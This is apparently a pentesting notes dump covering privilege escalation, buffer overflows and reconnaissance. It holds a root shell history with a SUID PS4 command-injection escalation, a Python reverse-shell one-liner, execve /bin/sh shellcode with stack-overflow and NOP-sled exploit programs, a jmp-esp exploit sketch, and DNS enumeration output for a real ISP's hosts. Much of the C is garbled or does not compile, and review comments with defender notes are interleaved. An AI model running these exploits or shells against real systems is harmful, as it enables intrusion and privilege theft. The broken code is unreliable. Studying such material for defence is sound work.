1389Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1390Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1391Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1392Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1393Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1394Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1395Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1396Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1397Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1398Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1399Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1400Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1401Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1402Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1403Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1404Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1405Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1406Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1407Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1408Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1409Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1410Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1411Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1412Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1413Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1414Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1415Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1416Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1417Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1418Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1419Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1420Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1421Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1422Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1423Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1424Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1425Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1426Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1427Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1428rootbash-4.1# history | tail -100
1429 115 ls
1430 116 cat /etc/hosts.allow
1431 117 arp -A
1432 118 arp
1433 119 arp -vpn
1434 120 arp -vn
1435 121 netstat -A
1436 122 netstat -r
1437 123 netstat -i
1438 124 netstat -g
1439 125 netstat -e
1440 126 netstat -l
1441 127 netstat
1442 128 man netstat
1443 129 netstat -tcp
1444 130 netstat -udp
1445 131 netstat -p tcp
1446 132 netstat -p udp
1447 133 netstat -p tcp 22
1448 134 netstat -p 22
1449 135 netstat -p 80
1450 136 netstat -p tcp
1451 137 netstat -p udp
1452 138 ls
1453 139 clear
1454 140 dmesg | grep /var/log
1455 141 dmesg | grep /var/log/messages.log
1456 142 cd /var/log
1457 143 ls
1458 144 dmesg | grep /var/log/syslog | less
1459 145 dmesg | grep /var/log/syslog | more
1460 146 dmesg | grep /var/log/syslog
1461 147 ls -la /var/log/syslog
1462 148 chmod 755 /var/log/syslog
1463 149 ls -la /var/log/syslog
1464 150 ls
1465 151 tail -f /var/log/syslog
1466 152 tail -f /var/log/syslog | more
1467 153 dmesg | grep /var/log/syslog > w0rd.txt
1468 154 cat w0rd.txt
1469 155 ls
1470 156 chmod 755 w0rd.txt
1471 157 ls
1472 158 cat w0rd.txt
1473 159 ls -la w0rd.txt
1474 160 rm -f w0rd.txt
1475 161 ls
1476 162 cat /var/log/syslog
1477 163 cat /var/log/syslog | less foo.txt
1478 164 cat /var/log/syslog | grep /usr/local/bin
1479 165 cat /var/log/syslog | grep /tmp
1480 166 cat /var/log/syslog | grep /rootbash
1481 167 ls
1482 168 cat /var/log/syslog
1483 169 ls
1484 170 dmesg /var/log/auth.log.2.gz
1485 171 cat /var/log/wtmp
1486 172 cat /var/run/utmp
1487 173 who am i
1488 174 users
1489 175 last
1490 176 finger
1491 177 cat /var/log/secure
1492 178 cat /var/log/auth.log
1493 179 head -5 /var/log/auth.log
1494 180 fc -l -10
1495 181 nano .bash_history
1496 182 history 100
1497 183 ls -la
1498 184 who am i
1499 185 cd /
1500 186 ls
1501 187 cd /home
1502 188 ls
1503 189 cd user/
1504 190 ls
1505 191 cd ..
1506 192 ls
1507 193 cat /etc/passwd
1508 194 cat /etc/shadow
1509 195 exit
1510 196 /usr/local/bin/suid-env2
1511 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1512 198 /tmp/rootbash -p
1513 199 exit
1514 200 cls
1515 201 exit
1516 202 ls
1517 203 cd tools
1518 204 ls
1519 205 /tmp/rootbash -p
1520 206 exit
1521 207 su newroot
1522 208 whoami
1523 209 cat /etc/passwd
1524 210 su root
1525 211 exit
1526 212 tail -f /var/log/messages
1527 213 cat /var/log/messages
1528 214 history | tail -100
1529rootbash-4.1# id
1530uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1531rootbash-4.1# whoami
1532root
1533rootbash-4.1# ls -la /home/user/bmillakid
1534rootbash-4.1# cd /home
1535rootbash-4.1# ls
1536user
1537rootbash-4.1# cd user
1538rootbash-4.1# ls
1539l33t.txt myvpn.ovpn tools
1540rootbash-4.1#
1541
1. Check whether the parameter "commandString" is set.
1559
2. If it is, the variable $command_string is assigned whatever was passed into the input field.
1561
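3. The program then enters a try block and calls passthru($command_string). You can read the docs on passthru() on PHP's website, but in general it executes whatever was entered into the input field as a system command and passes the output directly back to the browser. As described, nothing validates or allow-lists the value before it reaches passthru(), so this is a command-injection sink: whoever can submit the form can run commands with the web server's privileges.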
1563
4. If the try block does not succeed, the error is written to the page. In practice this rarely prints anything, because the command's stderr is not passed back to the browser; the catch is there because PHP doesn't let you have a try without a catch.
1565
1566
1567
1568reverse shell
1569http://10.10.202.91:8888/
1570/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc
1571ket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1572
1573
1574
1575
1576?noot=1 -1
1577
1582----BEGIN PGP PUBLIC KEY BLOCK-----
1583Comment: https://keybase.io/download
1584Version: Keybase Go 5.6.0 (windows)
1585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1633=QLLF
1634-----END PGP PUBLIC KEY BLOCK-----
1635
1636
1637//shell.c
/*
 * shell.c: replace the current process image with /bin/sh.
 *
 * The argument vector holds the program path as argv[0] followed by the
 * terminating null pointer; the environment pointer passed to execve() is
 * null. A successful execve() never returns, so exit(0) is reached only
 * when the call fails, and the process then still reports status 0.
 */
int main() {
    char *sh_argv[2] = { "/bin/sh", 0x0 };

    execve(sh_argv[0], sh_argv, 0x0);

    /* Only reached on execve() failure. */
    exit(0);
}
1646
1647
1648//shellcode.c
/*
 * Example payload bytes used throughout these notes (40 escaped bytes in
 * three quoted pieces; the quotes are typographic characters from the paste).
 *
 * What the bytes themselves show, useful when writing or reading detections:
 *   - the last seven bytes, \x2f\x62\x69\x6e\x2f\x73\x68, are ASCII "/bin/sh";
 *   - \xb0\x0b loads 0x0b into AL and \xcd\x80 is the x86 `int 0x80`
 *     instruction, i.e. system call 11 (execve) on 32-bit Linux.
 * A data buffer carrying an `int 0x80` next to a "/bin/sh" string is a
 * long-standing signature for this class of payload.
 */
1649char shellcode[] =
1650“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1651
/*
 * Test harness for the byte array above: the second statement stores the
 * address of `shellcode` through the pointer `ret`.
 *
 * NOTE(review): the first statement declares no identifier, so the listing
 * is not valid C as pasted. Presumably `ret` is meant to point at this
 * function's own saved return address (confirm against the original source).
 * Where data and stack pages are mapped non-executable (NX/DEP), returning
 * into a data array faults instead of running it.
 */
1652int main()
1653{
1654
1655 int = (int *)&ret +2;
1656 (*ret) = (int)shellcode;
1657
1658}
1659
[ask application to force input, causing the address we supplied to be loaded into EIP
1661,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1662
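When RET is popped off the stack and loaded into EIP, the first instruction of the shellcode is executed. This only works where the memory holding the shellcode is executable; with a non-executable stack (NX/DEP) the jump faults instead.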
1664
1665
1666Location pointer
1667
1668// find_start.c
/*
 * Intended to report the current stack pointer: the body is a single inline
 * assembly statement naming %esp and %eax, and there is no C return
 * statement, so the function relies on the value being left in the return
 * register (not something the C language guarantees).
 *
 * NOTE(review): `move1` is not an x86 mnemonic, so this would not assemble
 * as pasted. With address space layout randomisation (ASLR) enabled the
 * stack address differs per process, so one run's value says nothing
 * about another's.
 */
1669unsigned long find_start(void)
1670{
1671
1672 __asm__("move1 %esp, %eax");
1673
1674}
1675
/*
 * Prints the value returned by find_start().
 *
 * NOTE(review): the format string uses %n, which is the printf conversion
 * that *stores* the number of characters written so far through an int
 * pointer; here it is given an unsigned long value, which is undefined
 * behaviour. Presumably a hexadecimal conversion was meant (confirm
 * against the original source). main() also has no return statement.
 */
1676int main()
1677{
1678
1679 printf("0x%n\n",find_start());
1680}
1681
[putting programs into arrays with no bounds checking]
 [the victim has to be owned by root with the SUID bit set]
1684
1685sudo chown root victim
1686sudo chmod +s victim
1687
1688./victim <shellcode>padding>choice-of-returnaddress
1689
1690./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
1691
1692./victim $(printf "%0512x" 0)
1693./victim $(printf %0516x" 0)
1694./victim $(printf %0520x" 0)
1695./victim $(printf %0524x" 0)
1696Segfault
1697./victim $(printf %0528x" 0)
1698Segfault
1699[we can tell the saved return address is probably 524-528 bytes
1700shellcode = [40]
1701padding = [480]
1702saved ret address [0xbffffad8]
1703
1704./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
1705[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
1706
[little endian]
1708
1709./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
1710Illegal instruction
1711
17128%0484x\x38\xfa\xff\xbf")
1713
1714[program to guess offset between start of the program and first instruction for shellcode]
1715
1716#include <stdlib.h>
1717
1718#define offset_size 0
1719#define buffer_size 512
1720
1721
/*
 * Same 40 payload bytes as the earlier listing, here under the name `sc`.
 * NOTE(review): the declarator is repeated (`char sc[] = char sc[] =`) and
 * the quotes are typographic, so this line is not valid C as pasted.
 * The trailing bytes \x2f\x62\x69\x6e\x2f\x73\x68 are ASCII "/bin/sh".
 */
1722char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1723
/*
 * Second copy of the stack-pointer helper: one inline assembly statement
 * naming %esp and %eax, no C return statement.
 * NOTE(review): the argument to __asm__ is malformed as pasted (it opens
 * with `*` rather than a quote), so the listing does not compile.
 */
1724unsigned long find_start(void) {
1725
1726 __asm__(*mov1 %esp,%eax");
1727
1728}
1729
/*
 * Builds a byte string in `buff`, exports it as the environment variable
 * BUF and then starts a shell with system().
 *
 * From the visible statements:
 *   - bsize and offset default to buffer_size and offset_size and can be
 *     overridden by argv[1] and argv[2] (parsed with atoi(), no validation);
 *   - addr is find_start() minus offset, and the loop writes that value
 *     repeatedly through addr_ptr;
 *   - the bytes of `sc` are then copied in through `ptr`, the last byte is
 *     set to '\0', and the first four bytes are overwritten with "BUF=";
 *   - putenv() places the result in the environment inherited by the shell.
 *
 * NOTE(review): this listing has transcription errors and is not valid C
 * as pasted.
 *
 * Defender's view: the observable artefact is an unusually long
 * environment variable holding non-printable bytes and a repeated 4-byte
 * value. The approach depends on a guessable stack address and on
 * executable stack memory; ASLR, NX and compiler stack protectors exist to
 * remove exactly those preconditions.
 */
1730int main(int argc, char *argv[])
1731{
1732
1733 char *buff, *ptr;
1734 long *addr_ptr, addr;
1735 int offset=offset_size, bsize=buffer_size;
1736 int i;
1737
1738 if (argc > 1) bsize = atoi(argv[1]);
1739 if (argc > 2) offset = atoi(argv[2]);
1740
1741 addr = find_start() - offset;
1742 printf("attempt address: 0x%n\n",addr);
1743
1744 ptr = buff;
1745 addr_ptr =(long *) ptr;
1746 for (i - 0; i < bsize; i+=4)
1747 * (addr_ptr++) = addr;
1748
1749 ptr +=4;
1750
1751 for (i = 0; i < strlen(sc); i++)
1752 *(ptr++) = sc[i];
1753
1754 buff[bsize - 1] = '\0';
1755
1756 memcpy(buff, "BUF=",4);
1757 putenv(buff);
1758 system(" /bin/bash");
1759
1760}
1761
1762
1763[NOP]
1764
1765
1766
1767#include <stdlib.h>
1768
1769#define DEFAULT_OFFSET 0
1770#define DEFAULT_BUFFER_SIZE 512
1771#define NOP 0x90
1772
1773
/*
 * Third copy of the same payload bytes, declared as `shellcode`.
 * NOTE(review): the declarator is doubled (`char shellcode[] = char sc[] =`)
 * and the string is split across two lines inside a quoted piece, so this is
 * not valid C as pasted. The trailing bytes are ASCII "/bin/sh".
 */
1774 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
1775\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1776
/*
 * Stack-pointer helper used by main() below: a single inline assembly
 * statement naming %esp and %eax, with no C return statement, so the result
 * depends on the value being left in the return register.
 * NOTE(review): `mov1` is not an x86 mnemonic as pasted.
 */
1777unsigned long get_sp(void) {
1778 __asm__("mov1 %esp,%eax");
1779}
1780
/*
 * Variant of the previous program that pads the buffer with NOP bytes.
 *
 * From the visible statements (all collapsed onto one line in the paste):
 *   - bsize and offset default to DEFAULT_BUFFER_SIZE and DEFAULT_OFFSET and
 *     can be overridden by argv[1] and argv[2] via atoi();
 *   - buff is allocated with malloc(bsize); on failure a message is printed
 *     and the program exits with status 0;
 *   - addr is get_sp() minus offset and is written repeatedly across buff;
 *   - the first bsize/2 bytes are then set to NOP (0x90 per the #define);
 *   - the bytes of `shellcode` are copied in around the middle of buff;
 *   - the last byte is set to NUL, the first four bytes become "BUF=",
 *     and the buffer is exported with putenv() before system() starts a shell.
 *
 * NOTE(review): `void main` is non-standard, and the typographic quotes
 * mean the listing is not valid C as pasted.
 *
 * Defender's view: a long run of 0x90 bytes followed by code bytes and a
 * repeated address is the classic "NOP sled" layout and is a common IDS and
 * memory-forensics signature. NX, ASLR and stack protectors are the
 * standard mitigations for the technique.
 */
1781void main(int argc, char *argv[])
1782
1783{
1784
1785 char *buff, *ptr;
1786
1787 long *addr_ptr, addr;int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;int i;if (argc > 1) bsize = atoi(argv[1]);if (argc > 2) offset = atoi(argv[2]);if (!(buff = malloc(bsize))) {printf(“Can’t allocate memory.\n”);exit(0);}addr = get_sp() - offset;printf(“Using address: 0x%x\n”, addr);ptr = buff;addr_ptr = (long *) ptr;for (i = 0; i < bsize; i+=4)*(addr_ptr++) = addr;for (i = 0; i < bsize/2; i++)buff[i] = NOP;ptr = buff + ((bsize/2) - (strlen(shellcode)/2));for (i = 0; i < strlen(shellcode); i++)*(ptr++) = shellcode[i];buff[bsize - 1] = ‘\0’;memcpy(buff,”BUF=”,4);putenv(buff);system(“/bin/bash”);}
1788
1789
1790
1791[+] Getting nameservers
179263.150.72.4 - authns1.qwest.net
1793208.44.130.120 - authns2.qwest.net
1794[-] Zone transfer failed
1795
1796[+] TXT records found
1797"v=spf1 include:inet.qwest.net include:oss.qwest.net ~all"
1798[+] MX records found, added to target list
179910 mx.centurylink.net.
1800[*] Scanning qwest.net for A records
1801204.147.80.94 - qwest.net
1802198.105.254.228 - webdisk.qwest.net
1803198.105.244.228 - webdisk.qwest.net
1804204.154.232.10 - ns.qwest.net
1805198.105.254.228 - www2.qwest.net
1806198.105.244.228 - www2.qwest.net
180765.115.167.3 - news.qwest.net
180865.115.167.4 - news.qwest.net
180965.115.167.6 - news.qwest.net
181065.115.167.5 - news.qwest.net
1811198.105.254.228 - mysql.qwest.net
1812198.105.244.228 - mysql.qwest.net
1813127.0.0.1 - localhost.qwest.net
1814207.109.18.208 - mx.qwest.net
1815207.109.18.207 - mx.qwest.net
1816198.105.254.228 - webmail.qwest.net
1817198.105.244.228 - webmail.qwest.net
1818198.105.254.228 - web.qwest.net
1819198.105.244.228 - web.qwest.net
1820198.105.254.228 - www1.qwest.net
1821198.105.244.228 - www1.qwest.net
1822198.105.254.228 - www3.qwest.net
1823198.105.244.228 - www3.qwest.net
1824204.147.80.90 - search.qwest.net
1825204.147.85.136 - mx1.qwest.net
1826204.147.80.94 - my.qwest.net
1827204.147.85.136 - mx2.qwest.net
182863.226.138.15 - relay.qwest.net
1829150.159.229.23 - pop.qwest.net
183010.1.64.5 - help.qwest.net
1831198.105.254.228 - web1.qwest.net
1832198.105.244.228 - web1.qwest.net
1833198.105.254.228 - home.qwest.net
1834198.105.244.228 - home.qwest.net
1835198.105.254.228 - www4.qwest.net
1836198.105.244.228 - www4.qwest.net
183766.77.32.148 - stat.qwest.net
1838209.3.158.116 - stat.qwest.net
1839198.105.254.228 - web2.qwest.net
1840198.105.244.228 - web2.qwest.net
1841198.105.254.228 - ww.qwest.net
1842198.105.244.228 - ww.qwest.net
1843216.111.65.217 - ns1.qwest.net
1844198.105.254.228 - webmail2.qwest.net
1845198.105.244.228 - webmail2.qwest.net
1846155.70.16.46 - community.qwest.net
1847198.105.254.228 - www5.qwest.net
1848198.105.244.228 - www5.qwest.net
184963.224.76.66 - im.qwest.net
1850198.105.254.228 - wwww.qwest.net
1851198.105.244.228 - wwww.qwest.net
1852205.171.16.250 - ns2.qwest.net
1853205.171.3.100 - speedtest.qwest.net
1854198.105.254.228 - ww2.qwest.net
1855198.105.244.228 - ww2.qwest.net
1856207.225.135.208 - www.qwest.net
1857198.105.254.228 - web3.qwest.net
1858198.105.244.228 - web3.qwest.net
1859204.132.179.26 - ftp1.qwest.net
1860198.105.254.228 - www6.qwest.net
1861198.105.244.228 - www6.qwest.net
1862205.169.123.86 - w3.qwest.net
186366.77.128.66 - css.qwest.net
1864198.105.254.228 - web4.qwest.net
1865198.105.244.228 - web4.qwest.net
1866204.154.232.162 - travel.qwest.net
1867198.105.254.228 - web5.qwest.net
1868198.105.244.228 - web5.qwest.net
1869198.105.254.228 - webconf.qwest.net
1870198.105.244.228 - webconf.qwest.net
1871205.168.252.1 - track.qwest.net
1872204.154.232.38 - directory.qwest.net
1873204.147.80.75 - register.qwest.net
1874198.105.254.228 - www7.qwest.net
1875198.105.244.228 - www7.qwest.net
1876198.105.254.228 - web01.qwest.net
1877198.105.244.228 - web01.qwest.net
1878205.171.2.25 - redirect.qwest.net
1879205.171.3.25 - redirect.qwest.net
1880198.105.254.228 - webservices.qwest.net
1881198.105.244.228 - webservices.qwest.net
1882198.105.254.228 - webcam.qwest.net
1883198.105.244.228 - webcam.qwest.net
1884205.168.252.5 - pr.qwest.net
1885198.105.254.228 - myadmin.qwest.net
1886198.105.244.228 - myadmin.qwest.net
1887198.105.254.228 - wwwtest.qwest.net
1888198.105.244.228 - wwwtest.qwest.net
1889198.105.254.228 - www8.qwest.net
1890198.105.244.228 - www8.qwest.net
1891150.159.22.70 - security.qwest.net
1892198.105.254.228 - webservice.qwest.net
1893198.105.244.228 - webservice.qwest.net
1894198.105.254.228 - web6.qwest.net
1895198.105.244.228 - web6.qwest.net
1896198.105.254.228 - webserver.qwest.net
1897198.105.244.228 - webserver.qwest.net
1898204.147.80.90 - www-test.qwest.net
1899151.119.46.220 - ci.qwest.net
1900198.105.254.228 - webtest.qwest.net
1901198.105.244.228 - webtest.qwest.net
1902208.47.0.98 - puppet.qwest.net
1903198.105.254.228 - www9.qwest.net
1904198.105.244.228 - www9.qwest.net
1905198.105.254.228 - webdav.qwest.net
1906198.105.244.228 - webdav.qwest.net
1907198.105.254.228 - webmail1.qwest.net
1908198.105.244.228 - webmail1.qwest.net
1909150.159.230.15 - webdev.qwest.net
1910198.105.254.228 - web02.qwest.net
1911198.105.244.228 - web02.qwest.net
1912150.159.229.43 - rc.qwest.net
1913198.105.254.228 - webapps.qwest.net
1914198.105.244.228 - webapps.qwest.net
1915198.105.254.228 - web8.qwest.net
1916198.105.244.228 - web8.qwest.net
1917198.105.254.228 - ww3.qwest.net
1918198.105.244.228 - ww3.qwest.net
1919198.105.254.228 - webapp.qwest.net
1920198.105.244.228 - webapp.qwest.net
1921198.105.254.228 - www-dev.qwest.net
1922198.105.244.228 - www-dev.qwest.net
1923198.105.254.228 - webmail3.qwest.net
1924198.105.244.228 - webmail3.qwest.net
1925198.105.254.228 - wwwold.qwest.net
1926198.105.244.228 - wwwold.qwest.net
1927198.105.254.228 - www10.qwest.net
1928198.105.244.228 - www10.qwest.net
1929
1930
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
1933
/*
 * Never called by the visible code (main() only calls copy()); its body is
 * a single inline `jmp *%esp` instruction, so its only effect is to place
 * that instruction sequence in the program's text.
 *
 * NOTE(review): the function is closed with `{` instead of `}` as pasted,
 * so the listing does not compile. Real code should not carry such a
 * sequence; building as a position-independent executable with ASLR keeps
 * code addresses from being fixed across runs.
 */
1934void jumpesp(){
1935 __asm__("jmp *%esp"); //gadget to jump to esp
1936{
1937
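/*
 * Copy the caller's string into a fixed 1000-byte stack buffer.
 *
 * The original listing passed strlen(arg) straight to memcpy(), so any
 * argument of 1000 bytes or more wrote past the end of buf and over the
 * saved frame data (stack-based buffer overflow, CWE-121). The length is
 * now clamped to the buffer size and the copy is NUL-terminated; a null
 * argument is ignored instead of being handed to strlen().
 *
 * arg: NUL-terminated string from the command line (untrusted); input
 *      longer than the buffer is truncated.
 */
void copy(char *arg) {
    char buf[1000];
    size_t len;

    if (!arg) {
        return;
    }

    len = strlen(arg);
    if (len >= sizeof buf) {
        /* Leave room for the terminator; never write outside buf. */
        len = sizeof buf - 1;
    }

    memcpy(buf, arg, len);
    buf[len] = '\0';
}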
1942
/*
 * Entry point: hands the first command-line argument, if there is one, to
 * copy(). The argument is attacker-controllable input, so copy() is the
 * place where its length has to be bounded. Always returns 0.
 */
int main(int argc, char **argv) {
    if (argc <= 1) {
        return 0;
    }

    copy(argv[1]);
    return 0;
}
1950 dissa objdump get address of our jmp to esp
19510x80483f7
19523 how much buffer can it handle
1953
1954./vuln 'python -c 'print "A"*1000''
1955gdb r 'python -c 'print "A"*1000''+ "CCCC"'
1956
1957junk ="A" * {random}
1958padding = "CCCC"
1959jmpesp = "0x80483f7"
1960shellcode = ""\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
1961"\x53\x68\tty\x68\dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80
1962\x31\xc0\x50\x86//ssh\x86/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
1963